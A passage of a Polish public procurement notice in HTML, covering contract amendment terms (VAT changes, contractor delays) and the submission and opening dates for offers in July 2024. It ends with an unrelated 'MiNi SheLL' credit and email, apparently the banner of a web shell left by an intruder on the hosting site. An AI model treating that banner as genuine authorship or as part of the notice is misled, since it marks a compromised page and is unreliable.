(stawki) podatku VAT będzie obowiązywać strony wraz z wejściem w życie stosownych przepisów prawa. Maksymalna wartość umowy brutto w całym okresie obowiązywania umowy może ulec zmianie w zakresie proporcjonalnym do ewentualnego wprowadzenia i/lub zmiany stawki podatku VAT, jeśli będzie miała miejsce w czasie obowiązywania umowy.<br/>3. Wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania przedmiotu umowy lub zwiększenia wynagrodzenia w zakresie, w jakim konieczność dokonania zmiany została spowodowana przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu wynikającego z obowiązków Wykonawcy. <br/>4. Wyklucza się takie zmiany umowy, które byłyby niekorzystne dla Zamawiającego, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/przytezni</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-01 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com